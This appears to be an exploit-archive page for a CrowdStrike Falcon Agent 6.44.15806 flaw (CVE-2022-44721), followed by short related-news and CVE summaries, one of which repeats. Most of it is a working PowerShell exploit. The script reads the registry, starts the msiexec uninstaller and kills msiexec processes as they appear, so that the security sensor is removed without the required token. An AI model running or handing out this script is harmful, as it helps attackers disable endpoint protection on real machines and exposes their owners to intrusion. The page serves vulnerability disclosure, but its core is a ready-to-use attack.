Headline
CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue
CrowdStrike Falcon Agent version 6.44.15806 has an uninstall bypass flaw that works without an installation token.
# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token # Date: 30/11/2022 # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) # Vendor Homepage: https://www.crowdstrike.com/ # Author Homepage: https://www.deda.cloud/ # Tested On: All Windows versions # Version: 6.44.15806 # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"foreach($obj in $InstalledSoftware){ if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName')) { $uninstall_uuid = $obj.Name.Split("\")[6] }}$g_msiexec_instances = New-Object System.Collections.ArrayListWrite-Host "[+] Identified installed Falcon: $uninstall_uuid"Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"while($true){ if (get-process -Name "CSFalconService") { Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object { if (-Not $g_msiexec_instances.contains($_.id)){ $g_msiexec_instances.Add($_.id) if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){ Start-Sleep -Milliseconds 100 Write-Host "[+] Killing PID " + $g_msiexec_instances[-1] stop-process -Force -Id $g_msiexec_instances[-1] } } } } else { Write-Host "[+] CSFalconService process vanished...reboot and have fun!" break }}Related news
CrowdStrike Falcon 6.44.15806 allows an administrative attacker to uninstall Falcon Sensor, bypassing the intended protection mechanism in which uninstallation requires possessing a one-time token. (The sensor is managed at the kernel level.)
CrowdStrike Falcon 6.44.15806 allows an administrative attacker to uninstall Falcon Sensor, bypassing the intended protection mechanism in which uninstallation requires possessing a one-time token. (The sensor is managed at the kernel level.)
The vulnerability might not be noteworthy, but the reporting process may be A security firm has criticized CrowdStrike for operating a “ridiculous” bug bounty disclosure program following a sensor fla
A vulnerability was found in CrowdStrike Falcon 6.31.14505.0/6.42.15610. It has been classified as problematic. Affected is the Uninstallation Handler which makes it possible to circumvent and disable the security feature. The manipulation leads to missing authorization. The identifier of this vulnerability is VDB-206880.